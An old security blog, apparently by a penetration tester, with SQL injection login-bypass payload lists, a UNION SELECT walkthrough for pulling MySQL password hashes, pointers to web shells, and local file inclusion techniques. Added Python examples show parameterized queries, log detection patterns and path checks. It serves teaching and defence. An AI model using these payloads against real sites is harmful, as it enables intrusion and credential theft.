What I do

I am an Information Risk Consultant and Penetration Tester. I specialize mostly in penetrating secure networks and computer systems, where I simulate an organized, professional attack against your organization; afterwards, a detailed report summarizing the weaknesses found and the vectors exploited is delivered. This will help you gain control over your infrastructure's security and maximize your protection.

Saturday, April 28, 2007

INJECTIONS, ATTACKING ASP LOGIN PAGES

Hi,

I have been looking into a lot of attacks, especially the shopadmin ones, on the login pages of sites using different CMSs and running ASP.NET, and I have seen that most of the sites, especially those hosted by ISPs, haven't just been hosted but archived, and the admins haven't even thought about how secure their login pages are. In this article, I will share with you some login attempts an attacker will use, try, and gain administrative access with.

Username: admin'--
Username: ' or 1=1--

Username: admin
Password: admin' or a


Username: admin
Password: admin' or a=a --

user='' or ''=''
pass= '' or ''=''

- Login: hi' or 1=1--
- pass: hi' or 1=1--


Username: '; shutdown with nowait; --

Username: '; exec master..xp_xxx; --

Username: '; exec master..xp_cmdshell 'iisreset'; --


username = admin' or '6'='6




' or ''='

"'or''='"

'or"='

9,9,9

' or '

or 1=1?

or 1=1 --'

' or 'a'='a

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

' or 'x'='x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

Chintan ' --

Chintan " --

' OR 1=1 ?

hi' or 'a'='a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

admin' or a=a --

admin" or "a"="a

admin" or 1=1 --

admin' or 1=1 --

admin' or 'a'='a

admin') or ('a'='a

admin") or ("a"="a

These are about enough, so test your login pages and drop me a mail in case you find these helpful.
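To see why these strings work, and what stops them, here is an added example (not from the original post) in Python using an in-memory SQLite database: a login check that splices the username and password into the SQL text, beside the same check written with bound parameters. The table contents, the account names and the compare() helper are constructed for the demo; the payloads are the ones listed above. The stacked-query strings (shutdown, xp_cmdshell) are not run here: they depend on the database and driver accepting several statements in one call, which the SQLite driver refuses.

```python
import sqlite3


def make_db():
    """Constructed demo database: one admin account and one ordinary user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "correct-horse"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """The pattern the post attacks: user input is spliced into the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Hardened form: bound parameters are sent as data and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def compare(payload_user, payload_pass):
    """Run one credential pair through both implementations and report who logs in."""
    conn = make_db()
    try:
        vuln = login_vulnerable(conn, payload_user, payload_pass)
    except (sqlite3.Error, sqlite3.Warning) as exc:
        # Unbalanced quotes or a second statement make the concatenated query fail.
        vuln = "rejected: " + str(exc)
    safe = login_parameterized(conn, payload_user, payload_pass)
    conn.close()
    return {"vulnerable": vuln, "parameterized": safe}


if __name__ == "__main__":
    # Payloads taken from the list in the post, plus a legitimate login for contrast.
    for user, pwd in [("admin", "correct-horse"),
                      ("admin'--", "wrong"),
                      ("' or 1=1--", "x"),
                      ("' or 'a'='a", "' or 'a'='a")]:
        print(repr(user), repr(pwd), "->", compare(user, pwd))
```

The concatenated variant logs in as admin for admin'-- because the comment marker removes the password clause, and for ' or 1=1-- because the WHERE clause becomes always true; the parameterized variant returns None for both, since the driver compares the literal string admin'-- against the stored usernames. Checking that login code never builds SQL by concatenation, and testing it with exactly this list, is the defensive takeaway.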

Good weekend,

/Chuks

Wednesday, April 18, 2007

SQL INJECTIONS

This is a vulnerability a lot of hackers use when attacking web servers. By web servers I mean applications running on IIS or Apache, which are commonly used for hosting sites. This attack simply allows an attacker to alter backend SQL statements by manipulating the user input. To learn more about SQL injection, there are a lot of white papers on the net that can really help. See these pages:

http://www.acunetix.com/websitesecurity/sql-injection.htm


http://www.securiteam.com/securityreviews/5NP011FIUG.html

http://www.securiteam.com/securityreviews/5IP030K8AA.html

http://unixwiz.net/techtips/sql-injection.html

http://www.owasp.org/index.php/PHP_Top_5

And many others online.

Let's take an example in PHP, alright?

Let's say our site is www.sitevulnerable.com/index.php and index.php is vulnerable to SQL injection. So how would we attack? www.sitevulnerable.com/index.php?id=-1

Maybe you are asking me why -1; you can use any number, 1010101, whatever.

The injection above may give an error, and actually these errors are the ones I will use to pick up passwords, tables, etc.

So we go on by enumerating the tables:

www.sitevulnerable.com/index.php?id=-1 union select 1/*

We are using /* to close the query so as to grep the DB.

So we will continue adding columns like this until we get an output that will help us.

www.sitevulnerable.com/index.php?id=-1 union select 1,2/*

Remember, with this we are just grepping the DB for id 1, which is probably root.

www.sitevulnerable.com/index.php?id=-1 union select 4,3,2,1/*

and then I get an error like

3

1


We are still rolling........

So I will inject a crafted query like this:


www.sitevulnerable.com/index.php?id=-1 union select 4,DATABASE(),2,USER()/*

And the error I get will be the user name in the DB:

root@localhost

So let's grep the password from the DB:

www.sitevulnerable.com/index.php?id=-1 union select host,host,2,password from mysql.user/*

And our error is:

localhost

500372d40e775a87

Now that is a hashed MySQL password, which can be brute-forced using John the Ripper.

Download it from here:

http://www.openwall.com/john/

So if I get the password, how will I log in to the DB and upload my files?

Simple: get a running shell, like c99shell, c100, r57, etc.; they are all over the internet.
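The request sequence in this walkthrough is very visible in web server logs, so here is an added example (not from the original post) in Python that scans Apache combined-format access-log lines for the probing patterns used above: union select, the /* and -- terminators, quoted or clauses, reads of mysql.user, and stacked exec/shutdown statements. The log lines, IP addresses and timestamps are constructed for the demo, and the rule names are my own labels.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log (Apache combined format) replaying the probing sequence
# from the post; IPs, timestamps and sizes are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Apr/2007:10:01:02 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [28/Apr/2007:10:01:09 +0000] "GET /index.php?id=-1 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.5 - - [28/Apr/2007:10:01:15 +0000] "GET /index.php?id=-1%20union%20select%201/* HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.5 - - [28/Apr/2007:10:01:31 +0000] "GET /index.php?id=-1%20union%20select%204,DATABASE(),2,USER()/* HTTP/1.1" 200 640 "-" "Mozilla/5.0"
203.0.113.5 - - [28/Apr/2007:10:02:10 +0000] "GET /index.php?id=-1%20union%20select%20host,host,2,password%20from%20mysql.user/* HTTP/1.1" 200 655 "-" "Mozilla/5.0"
198.51.100.7 - - [28/Apr/2007:10:03:00 +0000] "POST /login.asp HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [28/Apr/2007:10:03:21 +0000] "GET /login.asp?user=%27%20or%201%3D1--&pass=x HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# One combined-format line: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Detection rules, applied to the URL-decoded query string only.
RULES = [
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("sql-comment", re.compile(r"--|/\*")),
    ("quoted-or", re.compile(r"['\"]\s*or\s+", re.I)),
    ("mysql-user-table", re.compile(r"\bmysql\.user\b", re.I)),
    ("stacked-statement", re.compile(r";\s*(exec|shutdown)\b", re.I)),
]


def scan_log(text):
    """Return one finding per request whose decoded query string trips a rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-HTTP line; skip rather than crash
        # Decode once so %20 and %27 become the space and quote the database saw.
        query = unquote_plus(urlsplit(m.group("target")).query)
        hits = [name for name, rx in RULES if rx.search(query)]
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "target": m.group("target"),
                "status": m.group("status"),
                "decoded_query": query,
                "rules": hits,
            })
    return findings


def suspicious_ips(findings):
    """Count flagged requests per client IP, the usual pivot for a first triage."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f["ip"], f["time"], f["status"], f["rules"], f["decoded_query"])
    print(suspicious_ips(hits))
```

The plain id=-1 request is deliberately not flagged on its own; what gives the probe away is the union select with the /* terminator that follows it, and the same source address then reading mysql.user. POST bodies are not in an access log, so login-page payloads sent by POST need application-side logging; the GET form shown here is flagged by the quoted-or and sql-comment rules. Inputs that are encoded twice would need a second unquote_plus pass before matching.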

A simple screenshot is shown below.

Hope this helped. Signing off,

/Chuks

Tuesday, April 17, 2007

EXPLAINING CONTENT MANAGEMENT SYSTEMS

A content management system is an application that is accessed with a web browser (Mozilla Firefox, Opera, Konqueror, etc.) over a network like the Internet or through an intranet. We actually call them web applications, and that's where we start talking about web application security.

We use these web applications for webmail, online retail sales, online auctions, wikis, weblogs, discussion boards (forums) and a lot of others.

A Content Management System simplifies the work of the administrators of a site when it comes to things like editing processes, creation, translation, publishing, archiving and a lot more services besides.

Errors and bugs are found and released every day, including hacked frameworks and new and zero-day exploits; people are made aware of them and patches are released. To learn more about web application security, you can check www.webappsec.org, a site I visit several times a day. Others are www.owasp.org, www.spidynamics.com, www.acunetix.com and www.cgisecurity.com.

Most of the Content Management Systems I know of are open source, so free for anybody who wants to have a website which really sings..........

/Chuks

Thursday, April 12, 2007

LOCAL FILE INCLUSION

Local file inclusion is when you view one of the remote system's local files through one of its web-based scripts, e.g. victimsite.com/vulnerablescript.php?script=../../../../../../../etc/passwd, which on a Unix/Linux system will bring up the passwd file.

It's normally found in web applications whose input isn't sanitised properly: http://www.victim.com/vulnerablescript.php=2

Now this is like a GET parameter request for 2 on the above URL. LFI works with the following:


- Null bytes: %00
- Directory traversal: /../

Let's assume the vulnerable script looks like this:

<?php
$file = $_GET["file"];        // GET parameter, used exactly as received
include("vuln/$file.php");    // include the GET parameter with the folder prefix and a .php suffix
?>



As we all know, the GET parameter is passed to the include function, which then loads the file, building the full path: /home/www/anotherfile/application/vulnerablescript.php

Even so, as far as PHP is concerned, it has a way of allowing uploads of files to the box's template folder, which will turn an LFI into an RFI. RFI is short for Remote File Inclusion. This will happen if allow_url_fopen is enabled, which, due to these vulnerabilities, will be disabled in PHP 6. You can read more about uploading in PHP here: http://au.php.net/manual/en/features.file-upload

So to check if our exploit works, we load the vulnerable script up in the URL and feed in an LFI; check this out.....

www.victimsite.com/vulnerablescript.php=../vulnerablescript.php

......and if it reloads, the site is vulnerable to LFI.

What will happen in the background is something like this:

/home/www/anotherfile/application/vuln/../vulnerablescript.php

Now this is a simple directory traversal.

Null bytes come into play when the script appends .php to the file name: the null byte terminates the string, so if you request vulnerablescript.php%00, everything after .php (the appended suffix) is ignored.
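Here is an added example (not from the original post; the PHP script above is the author's) in Python that models the include("vuln/$file.php") line: vulnerable_include_path() shows where a raw file parameter ends up once /../ segments and a %00 truncation are applied, classify() labels a request for logging, and safe_include_path() is the hardened form, which only accepts names from a fixed allowlist and then verifies the resolved path still lies under the application folder. BASE_DIR reuses the path from the post; the allowlist entries are constructed.

```python
import os

# Folder the post's include("vuln/$file.php") resolves against (path taken from the post).
BASE_DIR = "/home/www/anotherfile/application/vuln"
# Hypothetical allowlist of page names the application legitimately includes.
ALLOWED_PAGES = {"home", "about", "contact"}


def vulnerable_include_path(file_param):
    """Where include("vuln/$file.php") would point for a raw GET value.

    The split on NUL mimics the C string handling that let a %00 suffix drop the
    appended ".php" in PHP builds of the time; os.path.normpath then collapses the
    /../ segments exactly as the filesystem would (no disk access is needed).
    """
    raw = BASE_DIR + "/" + file_param + ".php"
    effective = raw.split("\x00", 1)[0]
    return os.path.normpath(effective)


def classify(file_param):
    """Label a request for logging: which technique, if any, the value relies on."""
    flags = []
    if "\x00" in file_param:
        flags.append("null-byte")
    if ".." in file_param.split("/"):
        flags.append("traversal")
    if not vulnerable_include_path(file_param).startswith(BASE_DIR + "/"):
        flags.append("escapes-base-dir")
    return flags


def safe_include_path(file_param):
    """Hardened form: allowlist the name, then confirm the resolved path stays in BASE_DIR."""
    if file_param not in ALLOWED_PAGES:
        return None  # unknown page name: refuse, never build a path from it
    base = os.path.realpath(BASE_DIR)
    candidate = os.path.realpath(os.path.join(base, file_param + ".php"))
    # realpath also follows symlinks, so a link planted inside the folder cannot
    # point the include outside it.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed requests: the post's traversal check, a passwd read with %00, a clean page.
    for value in ["../vulnerablescript", "../../../../../../../etc/passwd\x00", "home"]:
        print(repr(value), "->", vulnerable_include_path(value), classify(value),
              safe_include_path(value))
```

For ../vulnerablescript the modelled path is /home/www/anotherfile/application/vulnerablescript.php, the same result the post shows, and classify() reports traversal and escapes-base-dir; the hardened function returns None for it and only yields a path for an allowlisted name. In PHP 5.2 and later the separate allow_url_include directive governs include() of remote URLs, and null-byte truncation in include paths was closed in PHP 5.3.4, so the allowlist-plus-path check is the defence that stays relevant regardless of version.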

Remember, most of our sites have so many security holes you would be amazed, especially if the box is in the same LAN as the company or the institution. Another way of acting "Gone in 60 Seconds", huh!

The screenshot below shows an LFI.


Will be writing more soon on websecurity.

/Chuks

Wednesday, April 11, 2007

IT SECURITY IN MY COUNTRY

Hi.

In my country, computer security is not much of an issue as far as administration is concerned. You will find how simple it is to break in and how vulnerable the networks of big companies and government institutions are. So I wish to use this blog to address IT security and web security as a whole: how far the rabbit hole can go, and a little on exploits and vulnerabilities.